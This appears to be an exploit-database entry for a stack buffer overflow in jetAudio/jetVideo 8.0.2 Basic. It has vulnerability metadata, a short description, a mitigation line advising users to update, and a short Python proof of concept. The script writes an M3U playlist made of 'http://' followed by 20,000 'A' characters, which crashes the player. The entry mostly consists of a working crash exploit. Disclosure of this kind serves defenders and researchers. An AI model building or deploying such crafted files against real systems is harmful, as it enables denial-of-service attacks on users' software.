header-logo
Suggest Exploit
vendor:
jetaudio Basic
by:
Senator of Pirates
7,5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: jetaudio Basic
Affected Version From: 8.0.2 Basic
Affected Version To: 8.0.2 Basic
Patch Exists: YES
Related CWE: N/A
CPE: a:jetaudio:jetaudio_basic
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP PS3 En
2020

jetVideo Crash Exploit

The vulnerability is caused due to a boundary error within the processing of M3U files. By creating a specially crafted M3U file, an attacker can cause a stack-based buffer overflow, resulting in a denial of service condition.

Mitigation:

The vendor has released an update to address this vulnerability. Users should update to the latest version of jetVideo.
Source

Exploit-DB raw data:

# Exploit Title: [jetVideo Crash Exploit]
# Author: [Senator of Pirates]
# Email : [Senator.of.Pirates.team@gmail.com]
# Software Link: [http://www.jetaudio.com/download/jetvideo.html]
# Version: [8.0.2 Basic]
# Tested on: [Windows XP PS3 En]



header = "http://"
junk = "A" * 20000

payload = (header+junk)

f = open("Exploit.m3u","wb")
f.write(payload)
f.close()